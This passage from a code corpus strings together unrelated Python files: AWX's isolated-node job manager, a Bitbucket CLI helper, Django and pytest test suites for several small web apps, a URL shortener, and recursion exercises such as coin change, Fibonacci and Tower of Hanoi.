self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
self.thread = Thread(name='Camera Python Thread', target=self.update, args=())
self.thread.start()
return self
def update(self):
while not self.stopped:
(self.grabbed, self.frame) = self.stream.read()
logging.debug('[ThreadCamera] Frame loop finished.')
self.stream.release()
logging.debug('[ThreadCamera] Capture released.')
def read(self):
return self.frame
def stop(self) :
logging.debug('[ThreadCamera] Stopping...')
self.stopped = True
self.thread.join()
logging.debug('[ThreadCamera] Camera thread joined.')
def __exit__(self, exc_type, exc_value, traceback):
self.stream.release()
```
|
{
"source": "JestyDS/awx",
"score": 2
}
|
#### File: main/isolated/manager.py
```python
import fnmatch
import json
import os
import shutil
import stat
import tempfile
import time
import logging
import yaml
from django.conf import settings
import ansible_runner
import awx
from awx.main.utils import (
get_system_task_capacity
)
logger = logging.getLogger('awx.isolated.manager')
playbook_logger = logging.getLogger('awx.isolated.manager.playbooks')
def set_pythonpath(venv_libdir, env):
env.pop('PYTHONPATH', None) # default to none if no python_ver matches
for version in os.listdir(venv_libdir):
if fnmatch.fnmatch(version, 'python[23].*'):
if os.path.isdir(os.path.join(venv_libdir, version)):
env['PYTHONPATH'] = os.path.join(venv_libdir, version, "site-packages") + ":"
break
class IsolatedManager(object):
def __init__(self, event_handler, canceled_callback=None, check_callback=None, pod_manager=None):
"""
:param event_handler: a callable used to persist event data from isolated nodes
:param canceled_callback: a callable - which returns `True` or `False`
- signifying if the job has been prematurely
canceled
"""
self.event_handler = event_handler
self.canceled_callback = canceled_callback
self.check_callback = check_callback
self.started_at = None
self.captured_command_artifact = False
self.instance = None
self.pod_manager = pod_manager
def build_inventory(self, hosts):
if self.instance and self.instance.is_containerized:
inventory = {'all': {'hosts': {}}}
fd, path = tempfile.mkstemp(
prefix='.kubeconfig', dir=self.private_data_dir
)
with open(path, 'wb') as temp:
temp.write(yaml.dump(self.pod_manager.kube_config).encode())
temp.flush()
os.chmod(temp.name, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
for host in hosts:
inventory['all']['hosts'][host] = {
"ansible_connection": "kubectl",
"ansible_kubectl_config": path,
}
else:
inventory = '\n'.join([
'{} ansible_ssh_user={}'.format(host, settings.AWX_ISOLATED_USERNAME)
for host in hosts
])
return inventory
def build_runner_params(self, hosts, verbosity=1):
env = dict(os.environ.items())
env['ANSIBLE_RETRY_FILES_ENABLED'] = 'False'
env['ANSIBLE_HOST_KEY_CHECKING'] = str(settings.AWX_ISOLATED_HOST_KEY_CHECKING)
env['ANSIBLE_LIBRARY'] = os.path.join(os.path.dirname(awx.__file__), 'plugins', 'isolated')
set_pythonpath(os.path.join(settings.ANSIBLE_VENV_PATH, 'lib'), env)
def finished_callback(runner_obj):
if runner_obj.status == 'failed' and runner_obj.config.playbook != 'check_isolated.yml':
# failed for clean_isolated.yml just means the playbook hasn't
# exited on the isolated host
stdout = runner_obj.stdout.read()
playbook_logger.error(stdout)
elif runner_obj.status == 'timeout':
# this means that the default idle timeout of
# (2 * AWX_ISOLATED_CONNECTION_TIMEOUT) was exceeded
# (meaning, we tried to sync with an isolated node, and we got
# no new output for 2 * AWX_ISOLATED_CONNECTION_TIMEOUT seconds)
# this _usually_ means SSH key auth from the controller ->
# isolated didn't work, and ssh is hung waiting on interactive
# input e.g.,
#
# awx@isolated's password:
stdout = runner_obj.stdout.read()
playbook_logger.error(stdout)
else:
playbook_logger.info(runner_obj.stdout.read())
return {
'project_dir': os.path.abspath(os.path.join(
os.path.dirname(awx.__file__),
'playbooks'
)),
'inventory': self.build_inventory(hosts),
'envvars': env,
'finished_callback': finished_callback,
'verbosity': verbosity,
'cancel_callback': self.canceled_callback,
'settings': {
'job_timeout': settings.AWX_ISOLATED_LAUNCH_TIMEOUT,
'suppress_ansible_output': True,
},
}
def path_to(self, *args):
return os.path.join(self.private_data_dir, *args)
def run_management_playbook(self, playbook, private_data_dir, idle_timeout=None, **kw):
iso_dir = tempfile.mkdtemp(
prefix=playbook,
dir=private_data_dir
)
params = self.runner_params.copy()
params['playbook'] = playbook
params['private_data_dir'] = iso_dir
if idle_timeout:
params['settings']['idle_timeout'] = idle_timeout
else:
params['settings'].pop('idle_timeout', None)
params.update(**kw)
if all([
getattr(settings, 'AWX_ISOLATED_KEY_GENERATION', False) is True,
getattr(settings, 'AWX_ISOLATED_PRIVATE_KEY', None)
]):
params['ssh_key'] = settings.AWX_ISOLATED_PRIVATE_KEY
return ansible_runner.interface.run(**params)
def dispatch(self, playbook=None, module=None, module_args=None):
'''
Ship the runner payload to a remote host for isolated execution.
'''
self.handled_events = set()
self.started_at = time.time()
# exclude certain files from the rsync
rsync_exclude = [
# don't rsync source control metadata (it can be huge!)
'- /project/.git',
'- /project/.svn',
'- /project/.hg',
# don't rsync job events that are in the process of being written
'- /artifacts/job_events/*-partial.json.tmp',
# don't rsync the ssh_key FIFO
'- /env/ssh_key',
# don't rsync kube config files
'- .kubeconfig*'
]
for filename, data in (
['.rsync-filter', '\n'.join(rsync_exclude)],
):
path = self.path_to(filename)
with open(path, 'w') as f:
f.write(data)
os.chmod(path, stat.S_IRUSR)
extravars = {
'src': self.private_data_dir,
'dest': settings.AWX_PROOT_BASE_PATH,
'ident': self.ident
}
if playbook:
extravars['playbook'] = playbook
if module and module_args:
extravars['module'] = module
extravars['module_args'] = module_args
logger.debug('Starting job {} on isolated host with `run_isolated.yml` playbook.'.format(self.instance.id))
runner_obj = self.run_management_playbook('run_isolated.yml',
self.private_data_dir,
idle_timeout=max(60, 2 * settings.AWX_ISOLATED_CONNECTION_TIMEOUT),
extravars=extravars)
if runner_obj.status == 'failed':
self.instance.result_traceback = runner_obj.stdout.read()
self.instance.save(update_fields=['result_traceback'])
return 'error', runner_obj.rc
return runner_obj.status, runner_obj.rc
def check(self, interval=None):
"""
Repeatedly poll the isolated node to determine if the job has run.
On success, copy job artifacts to the controlling node.
On failure, continue to poll the isolated node (until the job timeout
is exceeded).
For a completed job run, this function returns (status, rc),
representing the status and return code of the isolated
`ansible-playbook` run.
:param interval: an interval (in seconds) to wait between status polls
"""
interval = interval if interval is not None else settings.AWX_ISOLATED_CHECK_INTERVAL
extravars = {'src': self.private_data_dir}
status = 'failed'
rc = None
last_check = time.time()
while status == 'failed':
canceled = self.canceled_callback() if self.canceled_callback else False
if not canceled and time.time() - last_check < interval:
# If the job isn't canceled, but we haven't waited `interval` seconds, wait longer
time.sleep(1)
continue
if canceled:
logger.warning('Isolated job {} was manually canceled.'.format(self.instance.id))
logger.debug('Checking on isolated job {} with `check_isolated.yml`.'.format(self.instance.id))
runner_obj = self.run_management_playbook('check_isolated.yml',
self.private_data_dir,
extravars=extravars)
status, rc = runner_obj.status, runner_obj.rc
if self.check_callback is not None and not self.captured_command_artifact:
command_path = self.path_to('artifacts', self.ident, 'command')
# If the configuration artifact has been synced back, update the model
if os.path.exists(command_path):
try:
with open(command_path, 'r') as f:
data = json.load(f)
self.check_callback(data)
self.captured_command_artifact = True
except json.decoder.JSONDecodeError: # Just in case it's not fully here yet.
pass
self.consume_events()
last_check = time.time()
if status == 'successful':
status_path = self.path_to('artifacts', self.ident, 'status')
rc_path = self.path_to('artifacts', self.ident, 'rc')
if os.path.exists(status_path):
with open(status_path, 'r') as f:
status = f.readline()
with open(rc_path, 'r') as f:
rc = int(f.readline())
else:
# if there's no status file, it means that runner _probably_
# exited with a traceback (which should be logged to
# daemon.log) Record it so we can see how runner failed.
daemon_path = self.path_to('daemon.log')
if os.path.exists(daemon_path):
with open(daemon_path, 'r') as f:
self.instance.result_traceback = f.read()
self.instance.save(update_fields=['result_traceback'])
else:
logger.error('Failed to rsync daemon.log (is ansible-runner installed on the isolated host?)')
status = 'failed'
rc = 1
# consume events one last time just to be sure we didn't miss anything
# in the final sync
self.consume_events()
return status, rc
def consume_events(self):
# discover new events and ingest them
events_path = self.path_to('artifacts', self.ident, 'job_events')
# it's possible that `events_path` doesn't exist *yet*, because runner
# hasn't actually written any events yet (if you ran e.g., a sleep 30)
# only attempt to consume events if any were rsynced back
if os.path.exists(events_path):
for event in set(os.listdir(events_path)) - self.handled_events:
path = os.path.join(events_path, event)
if os.path.exists(path) and os.path.isfile(path):
try:
event_data = json.load(
open(os.path.join(events_path, event), 'r')
)
except json.decoder.JSONDecodeError:
# This means the event we got back isn't valid JSON
# that can happen if runner is still partially
# writing an event file while it's rsyncing
# these event writes are _supposed_ to be atomic
# but it doesn't look like they actually are in
# practice
# in this scenario, just ignore this event and try it
# again on the next sync
continue
self.event_handler(event_data)
self.handled_events.add(event)
def cleanup(self):
extravars = {
'private_data_dir': self.private_data_dir,
'cleanup_dirs': [
self.private_data_dir,
],
}
logger.debug('Cleaning up job {} on isolated host with `clean_isolated.yml` playbook.'.format(self.instance.id))
self.run_management_playbook(
'clean_isolated.yml',
self.private_data_dir,
extravars=extravars
)
@classmethod
def update_capacity(cls, instance, task_result):
instance.version = 'ansible-runner-{}'.format(task_result['version'])
if instance.capacity == 0 and task_result['capacity_cpu']:
logger.warning('Isolated instance {} has re-joined.'.format(instance.hostname))
instance.cpu = int(task_result['cpu'])
instance.memory = int(task_result['mem'])
instance.cpu_capacity = int(task_result['capacity_cpu'])
instance.mem_capacity = int(task_result['capacity_mem'])
instance.capacity = get_system_task_capacity(scale=instance.capacity_adjustment,
cpu_capacity=int(task_result['capacity_cpu']),
mem_capacity=int(task_result['capacity_mem']))
instance.save(update_fields=['cpu', 'memory', 'cpu_capacity', 'mem_capacity', 'capacity', 'version', 'modified'])
def health_check(self, instance_qs):
'''
:param instance_qs: List of Django objects representing the
isolated instances to manage
Runs playbook that will
- determine if instance is reachable
- find the instance capacity
- clean up orphaned private files
Performs save on each instance to update its capacity.
'''
instance_qs = [i for i in instance_qs if i.enabled]
if not len(instance_qs):
return
try:
private_data_dir = tempfile.mkdtemp(
prefix='awx_iso_heartbeat_',
dir=settings.AWX_PROOT_BASE_PATH
)
self.runner_params = self.build_runner_params([
instance.hostname for instance in instance_qs
])
self.runner_params['private_data_dir'] = private_data_dir
self.runner_params['forks'] = len(instance_qs)
runner_obj = self.run_management_playbook(
'heartbeat_isolated.yml',
private_data_dir
)
for instance in instance_qs:
task_result = {}
try:
task_result = runner_obj.get_fact_cache(instance.hostname)
except Exception:
logger.exception('Failed to read status from isolated instances')
if 'awx_capacity_cpu' in task_result and 'awx_capacity_mem' in task_result:
task_result = {
'cpu': task_result['awx_cpu'],
'mem': task_result['awx_mem'],
'capacity_cpu': task_result['awx_capacity_cpu'],
'capacity_mem': task_result['awx_capacity_mem'],
'version': task_result['awx_capacity_version']
}
IsolatedManager.update_capacity(instance, task_result)
logger.debug('Isolated instance {} successful heartbeat'.format(instance.hostname))
elif instance.capacity == 0:
logger.debug('Isolated instance {} previously marked as lost, could not re-join.'.format(
instance.hostname))
else:
logger.warning('Could not update status of isolated instance {}'.format(instance.hostname))
if instance.is_lost(isolated=True):
instance.capacity = 0
instance.save(update_fields=['capacity'])
logger.error('Isolated instance {} last checked in at {}, marked as lost.'.format(
instance.hostname, instance.modified))
finally:
if os.path.exists(private_data_dir):
shutil.rmtree(private_data_dir)
def run(self, instance, private_data_dir, playbook, module, module_args, ident=None):
"""
Run a job on an isolated host.
:param instance: a `model.Job` instance
:param private_data_dir: an absolute path on the local file system
where job-specific data should be written
(i.e., `/tmp/awx_N_xyz/`)
:param playbook: the playbook to run
:param module: the module to run
:param module_args: the module args to use
For a completed job run, this function returns (status, rc),
representing the status and return code of the isolated
`ansible-playbook` run.
"""
self.ident = ident
self.instance = instance
self.private_data_dir = private_data_dir
self.runner_params = self.build_runner_params(
[instance.execution_node],
verbosity=min(5, self.instance.verbosity)
)
status, rc = self.dispatch(playbook, module, module_args)
if status == 'successful':
status, rc = self.check()
return status, rc
```
|
{
"source": "jesuejunior/b2tool",
"score": 2
}
|
#### File: b2tool/b2tool/conf.py
```python
import ConfigParser
import os
BASE_URL_V1 = 'https://bitbucket.org/api/1.0/'
BASE_URL_V2 = 'https://bitbucket.org/api/2.0/'
CFGFILE = os.path.join(os.path.expanduser('~'), '.b2tool')
def get_or_default(config, section, key, default=''):
try:
return config.get(section, key)
except ConfigParser.NoSectionError:
return default
except ConfigParser.NoOptionError:
return default
def get_credentials():
if os.path.isfile(CFGFILE):
conf = ConfigParser.SafeConfigParser()
conf.read(CFGFILE)
username = get_or_default(conf, 'AUTH', 'username')
password = get_or_default(conf, 'AUTH', 'password')
return username,password
else:
return '',''
```
#### File: b2tool/b2tool/rules.py
```python
from datetime import datetime
import re
class Pull(object):
"""
"""
def __init__(self, *args, **kwargs):
self.args, self.kwargs = args, kwargs
@staticmethod
def oldest(objects):
# ['source']['repository']['name']
# "state": "OPEN",
# "created_on": "2014-08-17T05:39:38.501662+00:00",
# "updated_on": "2014-08-17T05:39:38.521747+00:00",
# "merge_commit": null,
# "id": 9
# ['source']['branch']['name']
objs = []
for obj in objects:
if not objs:
objs.append(obj)
created_on = parse_date(obj.get('created_on'))
if created_on < parse_date(objs[0].get('created_on')):
objs.pop()
objs.append(obj)
if objs:
return {'branch': objs[0]['source']['branch']['name'], 'id': objs[0].get('id')}
else:
return {}
def parse_date(dt):
#['2014', '08', '16', '05', '39', '38', '501662', '00', '00']
# 0 = year
# 1 = month
# 2 = day
# 3 = hour
# 4 = minutes
# 5 = seconds
result = map(lambda x: int(x), re.findall('\d{1,4}\d{1,2}', dt))
for i in range(0,3):
result.pop()
return datetime(*result)
```
#### File: b2tool/test/pull_request_test.py
```python
import unittest
import mock
from b2tool.commands import listall
class PullRequestTest(unittest.TestCase):
def setUp(self):
self.obj = [
{
u"source": {
u"branch": {
u"name": u"develop"
}
},
u"state": u"OPEN",
u"created_on": u"2014-08-07T03:41:17.181902+00:00",
u"updated_on": u"2014-08-18T21:08:13.471908+00:00",
u"merge_commit": 'null',
u"id": 85
},
{
u'source': {
u'branch': {
u'name': u'feature/new-config-vagrantfile'
},
},
u"state": u"OPEN",
u"created_on": u"2014-08-13T00:55:43.127689+00:00",
u"updated_on": u"2014-08-18T18:31:42.329587+00:00",
u"merge_commit": 'null',
u"id": 86
}
]
self.response = mock.MagicMock()
self.response.headers = {}
self.response.status_code = 000
def test_get_all_pull_requests(self):
self.response.status_code = 200
with mock.patch("requests.get", return_value=self.response):
res = listall('test123', '123test')
self.assertEquals(res, 1)
def test_get_oldest_pull_request(self):
self.fail()
```
|
{
"source": "jesuejunior/django-modeanalytics",
"score": 3
}
|
#### File: django-modeanalytics/modeanalytics/tests.py
```python
from typing import Dict
from django.conf import settings
from django.test import TestCase
from .models import ModeReportModel
class TestGenerateReportUrl(TestCase):
"""
How to validate using a mode tool
Link: https://mode.com/help/articles/test-your-white-label-embeds/
"""
settings.MODE_ORG = "test"
settings.MODE_ACCESS_KEY = "1234567890"
settings.MODE_ACCESS_SECRET = "0987654321"
def test_create_url_ok(self):
ts: int = 1_532_446_786
expected = "https://app.mode.com/test/reports/12eaf1245c7e/embed?access_key=1234567890&max_age=1800×tamp=1532446786"
model = ModeReportModel()
model.name = "test1"
model.run_token = "<PASSWORD>"
result: str = model._ModeReportModel__create_url(ts)
self.assertEqual(expected, result)
def test_sign_url_ok(self):
ts: int = 1_532_446_786
url = "https://app.mode.com/test/reports/12eaf1245c7e/embed?access_key=1234567890&max_age=1800×tamp=1532446786"
model = ModeReportModel()
model.name = "test1"
model.run_token = "<PASSWORD>"
result: str = model._ModeReportModel__sign_url(url, ts)
expected: str = "https://app.mode.com/test/reports/12eaf1245c7e/embed?access_key=1234567890&max_age=1800×tamp=1532446786&signature=bce6321f616c77321e8dcc7943b6f3f8c23425b23c87a14a23395a423f605da9"
self.assertEqual(expected, result)
def test_params_ok(self):
model = ModeReportModel()
model.name = "testx"
model.run_token = "<PASSWORD>"
params: Dict[str, str] = {"email": "<EMAIL>"}
model._ModeReportModel__convert_params(params)
expected: Dict[str, str] = {"max_age": 1800, "param_email": "<EMAIL>"}
self.assertEqual(expected, model.params)
def test_params_error(self):
model = ModeReportModel()
model.name = "testy"
model.run_token = "<PASSWORD>"
params: Dict[str, str] = {"email": "jj@<PASSWORD>"}
model._ModeReportModel__convert_params(params)
expected: Dict[str, str] = {"max_age": 1800, "email": "jj<PASSWORD>"}
self.assertNotEqual(expected, model.params)
def test_params_override(self):
model = ModeReportModel()
model.name = "testy"
model.run_token = "<PASSWORD>"
model.params.update({"display[]": "right_side"})
params: Dict[str, str] = {"email": "jj<PASSWORD>", "display[]": "left_side"}
model._ModeReportModel__convert_params(params)
expected: Dict[str, str] = {"max_age": 1800, "param_email": "jj@admin", "param_display[]": "left_side"}
self.assertEqual(expected, model.params)
def test_params_saved_override(self):
model = ModeReportModel()
model.id = 1
model.name = "testy"
model.run_token = "<PASSWORD>"
model.params.update({"email": ""})
model.save()
params: Dict[str, str] = {"email": "<EMAIL>", "phone": ""}
report = ModeReportModel.objects.get(pk=1)
report._ModeReportModel__convert_params(params)
expected: Dict[str, str] = {"max_age": 1800, "param_email": "<EMAIL>", "param_phone": ""}
self.assertEqual(expected, report.params)
def test_mixed_params(self):
"""
Test when there are params from web and from db with same names
emails[] -> db
emails -> web
"""
pass
def test_get_full_report_url(self):
"""
Makes sense test it?
"""
pass
```
|
{
"source": "jesuejunior/luiza",
"score": 2
}
|
#### File: maria/jose/tests.py
```python
from __future__ import unicode_literals
import json
import pytest
from model_mommy import mommy
from .models import Employee
@pytest.mark.django_db
class EmployeeModelTest:
def test_create_correct_user(self):
data = {
"name": "<NAME>",
"email": "<EMAIL>",
"department": "mobile",
}
user = Employee.objects.create(**data)
assert user.id == 1
assert user.name == '<NAME>'
assert user.email == '<EMAIL>'
assert user.department == 'mobile'
@pytest.mark.django_db
class EmployeeApiTest:
@pytest.fixture(autouse=True)
def setUp(self, client):
self.client = client
def test_create_employee_ok(self):
data = {
"name": "<NAME>",
"email": "<EMAIL>",
"department": "mobile",
}
response = self.client.post('/employee/', data=json.dumps(data),
content_type='application/javascript')
assert response.status_code == 201
def test_create_employee_with_wrong_data(self):
data = {
"name": "<NAME>",
"department": "mobile",
}
response = self.client.post('/employee/', data=json.dumps(data),
content_type='application/javascript')
assert response.status_code == 400
def test_email_exist_return_error(self):
mommy.make_one(Employee, email='<EMAIL>')
data = {
"name": "<NAME>",
"email": "<EMAIL>",
"department": "mobile",
}
response = self.client.post('/employee/', data=json.dumps(data),
content_type='application/javascript')
assert response.status_code == 400
assert response.data.get('message') == u'E-mail already exists'
def test_create_employee_and_saved_into_db(self):
data = {
"name": "<NAME>",
"email": "<EMAIL>",
"department": "mobile",
}
self.client.post('/employee/', data=json.dumps(data),
content_type='application/javascript')
employee = Employee.objects.get(email='<EMAIL>')
assert employee.name == u'<NAME>'
assert employee.email == '<EMAIL>'
assert employee.department == 'mobile'
def test_list_empty_employees(self):
response = self.client.get('/employee/', content_type='application/javascript')
assert response.data == []
def test_list_with_some_employees(self):
mommy.make_many(Employee, 5)
response = self.client.get('/employee/', content_type='application/javascript')
assert len(response.data) == 5
def test_delete_employee(self):
mommy.make_one(Employee, id=1)
mommy.make_many(Employee, 5)
response = self.client.delete('/employee/1', content_type='application/javascript')
assert response.status_code == 204
def test_try_delete_employee_not_found(self):
mommy.make_many(Employee, 5)
response = self.client.delete('/employee/1234', content_type='application/javascript')
assert response.status_code == 204
def test_delete_employee_check_in_db(self):
mommy.make_one(Employee, id=1)
mommy.make_many(Employee, 5)
assert Employee.objects.count() == 6
self.client.delete('/employee/1', content_type='application/javascript')
assert Employee.objects.count() == 5
```
|
{
"source": "jesuejunior/rocket",
"score": 2
}
|
#### File: nepal/tests/test_container.py
```python
from __future__ import print_function
import json
import pytest
from nepal.models.container import Container
from nepal.models.node import Node
from profile.models.user import User
from toolbox.icepick import ordered
@pytest.mark.django_db
class ContainerTest:
@pytest.fixture(autouse=True)
def setUp(self, client):
self.client = client
self.user = User.objects.create_user(email='<EMAIL>', password='<PASSWORD>')
response = self.client.post('/users/login', data={'email': '<EMAIL>',
'password': '<PASSWORD>'})
token = response.data.get('token')
self.headers = {'HTTP_AUTHORIZATION': 'JWT {0}'.format(token)}
node1 = {
'name': 'node1',
'so': 'centos',
'provider': 'do',
'ip': '192.168.127.12'
}
self.node = Node.objects.create(**node1)
container1 = {
'id': 100,
'name': 'container1',
'config': {}
}
self.container = Container.objects.create(**container1)
self.container.nodes.add(self.node)
@pytest.mark.django_db(transaction=True)
def test_create_new_container(self):
data = {
'name': 'container_test',
'nodes': [self.node.id],
'config': {
"registry": {
"image": "registry:2.4",
"environment": [
"RACK_ENV=development",
"SHOW=true",
"DEBUG=False"
],
"volumes": [
"/opt/registry/tmp:/tmp/registry-dev:Z",
"/opt/nginx/certs:/certs:Z"
],
"expose": [
5000
],
"ports": [
"5000:5000"
]
}
}
}
result = self.client.post('/containers', data=json.dumps(data),
content_type='application/json', **self.headers)
# TODO: must be assert more things
assert 201 == result.status_code
result_db = Container.objects.get(name='container_test')
assert 'container_test' == result_db.name
assert ordered(data.get('config')) == ordered(result_db.config)
@pytest.mark.xfail
@pytest.mark.django_db(transaction=True)
def test_start_a_container(self):
response = self.client.get('/conteiners/1/?action=start',
content_type='application/json', **self.headers)
assert {} == response.data
@pytest.mark.django_db(transaction=True)
def test_get_container_all(self):
response = self.client.get('/containers',
content_type='application/json', **self.headers)
assert 1 == len(response.data)
@pytest.mark.django_db(transaction=True)
def test_get_container_by_id(self):
response = self.client.get('/containers/100', content_type='application/json',
**self.headers)
result = response.data
assert 200 == response.status_code
assert 100 == result.get('id')
@pytest.mark.django_db(transaction=True)
def test_update_container_ok(self):
data = {
'name': 'app1',
'nodes': [self.node.id],
'config': {
"registry": {
"image": "registry:2.4",
"environment": [
"RACK_ENV=development",
"SHOW=true",
"DEBUG=False"
],
"expose": [
5000
],
"ports": [
"5000:5000"
]
}
}
}
response = self.client.put('/containers/100', data=json.dumps(data),
content_type='application/json', **self.headers)
assert 200 == response.status_code
@pytest.mark.django_db(transaction=True)
def test_try_update_container_not_found(self):
response = self.client.put('/containers/132', data=json.dumps({}),
content_type='application/json', **self.headers)
assert 404 == response.status_code
@pytest.mark.django_db(transaction=True)
def test_delete_container_ok(self):
response = self.client.delete('/containers/100', content_type='application/json',
**self.headers)
assert 204 == response.status_code
@pytest.mark.django_db(transaction=True)
def test_try_delete_container_that_not_exist(self):
response = self.client.delete('/containers/122', content_type='application/json',
**self.headers)
assert 404 == response.status_code
@pytest.mark.django_db(transaction=True)
def test_get_count_nodes(self):
result = self.client.get('/containers?action=count', content_type='application/json',
**self.headers)
assert 200 == result.status_code
assert 1 == result.data.get('result')
```
|
{
"source": "jesuejunior/stone",
"score": 3
}
|
#### File: jesuejunior/stone/generator.py
```python
import string
import random
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
for x in range(0, 10):
print(id_generator())
```
#### File: onix/views/block.py
```python
from braces.views import LoginRequiredMixin
from django.core.paginator import Paginator, PageNotAnInteger, InvalidPage, EmptyPage
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response, render
from django.template.response import TemplateResponse
from django.views.generic import View, ListView
from onix.models import Block, Material
from tools.code_generator import generate_code
class BlockTemplateView(LoginRequiredMixin, View):
template_name = 'block/new.html'
def get(self, request, *args, **kwargs):
cxt = self.get_context_data(request)
return TemplateResponse(
request=self.request,
template=self.template_name,
context=cxt,
**kwargs
)
def post(self, request, *args, **kwargs):
cxt = self.get_context_data(request)
material_id = request.POST.get('material_id')
number = request.POST.get('number')
code = None
while(True):
code = generate_code()
if not Block.objects.filter(code=code).exists():
break
if request.user.is_authenticated() and number and material_id:
if Block.objects.filter(material_id=material_id, number=number).exists():
material = Material.objects.get(pk=material_id).name
cxt['message']= u'O código [{0}] já foi utilizada para [{1}], por favor verifique os dados.'.format(number, material)
cxt['status'] = 'error'
return TemplateResponse(
request=self.request,
template=self.template_name,
context=cxt,
status=400,
**kwargs
)
result = Block.objects.get_or_create(material_id=material_id, number=number, code=code)
saved = result[0].save()
if saved:
return HttpResponse(reverse('blocks'), content={'message': 'Bloco criado com sucesso.', 'status': 'ok'})
return HttpResponseRedirect(reverse('blocks'))
def get_context_data(self, request):
_question = Block.objects.select_related().all()
paginator = Paginator(_question, 50)
page = request.GET.get('page')
try:
blocks = paginator.page(page)
except PageNotAnInteger:
blocks = paginator.page(1)
except (EmptyPage, InvalidPage):
blocks = paginator.page(paginator.num_pages)
cxt = {
'blocks': blocks,
'materials': Material.objects.all()
}
return cxt
class BlockListTemplateView(LoginRequiredMixin, ListView):
template_name = 'block/list.html'
model = Block
```
|
{
"source": "jesuejunior/urlreduce",
"score": 2
}
|
#### File: reducer/tests/test_model.py
```python
from unittest import TestCase
from django.contrib.auth.models import User
from django.db import models
from reducer.models import Link, Owner
class LinkModelTest(TestCase):
def test_url_hash(self):
link = Link._meta.get_field_by_name('url_hash')[0]
self.assertEquals(link.__class__, models.CharField)
self.assertEquals(link.max_length, 255)
self.assertTrue(link.null)
self.assertTrue(link.blank)
self.assertTrue(link.unique)
def test_user(self):
link = Link._meta.get_field_by_name('user')[0]
self.assertEquals(link.__class__, models.ForeignKey)
def test_url(self):
link = Link._meta.get_field_by_name('url')[0]
self.assertEquals(link.__class__, models.URLField)
def test_dt_created(self):
link = Link._meta.get_field_by_name('dt_created')[0]
self.assertEquals(link.__class__, models.DateTimeField)
self.assertTrue(link.auto_now_add)
class OwnerModelTest(TestCase):
def test_link(self):
owner = Owner._meta.get_field_by_name('link')[0]
self.assertEquals(owner.__class__, models.ForeignKey)
def test_owners(self):
owner = Owner._meta.get_field_by_name('link')[0]
self.assertEquals(owner.__class__, models.ForeignKey)
class UseruModelTest(TestCase):
def test_username(self):
user = User._meta.get_field_by_name('username')[0]
self.assertEquals(user.max_length, 30)
self.assertTrue(user.unique)
```
#### File: urlreduce/reducer/views.py
```python
import urllib2
from django.core.paginator import Paginator, EmptyPage, InvalidPage, PageNotAnInteger
from django.template.response import TemplateResponse
from django.views.defaults import page_not_found
from common.login_required_mixin import LoginRequiredMixin
from reducer.forms import ReduceURLForm
from django.views.generic import View, TemplateView, RedirectView
from reducer.models import Link, Owner
class HomeTemplateView(View):
template_name = 'home.html'
def get(self, request, *args, **kwargs):
cxt = self.get_context_data()
return TemplateResponse(
request=self.request,
template=self.template_name,
context=cxt,
**kwargs
)
def post(self, request, *args, **kwargs):
cxt = self.get_context_data()
req = request.POST
authenticated = request.user.is_authenticated()
if authenticated:
req = req.copy()
req[u'user'] = request.user.pk
form = ReduceURLForm(req)
#Não deixar cadastrar URL repetida economia de disco/memoria
if form.is_valid():
link = Link.objects.filter(url=form.cleaned_data['url'])
link = link[0] if link else None
if not link:
link = form.save()
if authenticated:
owner, created = Owner.objects.get_or_create(link=link)
owner.owners.add(request.user)
cxt['link'] = link.to_dict()
else:
cxt['link'] = '500'
#TODO - Se a url já estiver cadastrada o dono não muda e as urls existente só
#TODO - aparece para a primeira pessoa, pensar como corrigir isso
return TemplateResponse(
request=self.request,
template=self.template_name,
context=cxt,
**kwargs
)
def get_context_data(self, **kwargs):
cxt = {}
cxt['form_url'] = ReduceURLForm
return cxt
class MyLinksTemplateView(LoginRequiredMixin, TemplateView):
template_name = 'my-links.html'
def get(self, request, *args, **kwargs):
links = Link.objects.filter(owner__owners=request.user)
paginator = Paginator(links, 10)
page = request.GET.get('page')
try:
links = paginator.page(page)
except PageNotAnInteger:
links = paginator.page(1)
except (EmptyPage, InvalidPage):
links = paginator.page(paginator.num_pages)
cxt = {'links': links}
return self.render_to_response(cxt)
class GoToRedirectView(RedirectView):
def get(self, request, *args, **kwargs):
url_hash = kwargs.get('url_hash')
try:
link = Link.objects.decode(url_hash)
self.url = urllib2.unquote(link)
return super(GoToRedirectView, self).get(request, *args, **kwargs)
except Link.DoesNotExist:
return page_not_found(request)
```
|
{
"source": "je-suis-tm/recursion-and-dynamic-programming",
"score": 4
}
|
#### File: je-suis-tm/recursion-and-dynamic-programming/coin change recursion.py
```python
def coin_change(num,choice):
#base case
if num==0:
return 1
#prevent stack overflow
if num<0:
return 0
output=0
#iterate through cases of exclusion
for i in range(len(choice)):
#case of inclusion
include=coin_change(num-choice[i],choice)
exclude=0
#case of exclusion
if i>=1:
exclude=coin_change(num,choice[:i])
#two sub problems merge into a big one
output=include+exclude
return output
# In[3]:
coin_change(4,[1,2,3])
```
#### File: je-suis-tm/recursion-and-dynamic-programming/fibonacci with memoization.py
```python
global mem
mem={1:1,2:1}
import datetime as dt
#fib(n) is recursion with memory
#everytime we do the calculation, we store it in the dictionary
#i denote the key as the n th fibonacci number
#the value as the number itself
#if we can find the key in dictionary
#we simply return the value
#if not, we append the dictionary then return the value
def fib(n):
if n in mem:
return mem[n]
else:
mem[n]=(fib(n-1)+fib(n-2))
return mem[n]
#this is the fibonacci recursion function without memory
#it is basically algorithm 101 for any coding language
def f(n):
if n==1:
return 1
elif n==2:
return 1
else:
return f(n-1)+f(n-2)
#i calculate how long these two functions take
#print out the comparison
def compare(n):
t1=dt.datetime.now()
f(n)
t2=dt.datetime.now()
print('recursion: ',t2-t1)
t1=dt.datetime.now()
fib(n)
t2=dt.datetime.now()
print('recursion with memory: ',t2-t1)
compare(20)
```
#### File: je-suis-tm/recursion-and-dynamic-programming/hanoi tower.py
```python
def hanoi(n,a,b,c):
#rule states that each time we can only move one element
#so when the recursion reaches to base case 1
#we print the movement of elements from a to c
if n==1:
print(a,'-',c)
return
#for the general case
#the first step is to move everything above the base case from column a to column b
#note that we set print a to c when n reaches one
#so in this case we reorder the function, replace c with column b where elements actually move towards
hanoi(n-1,a,c,b)
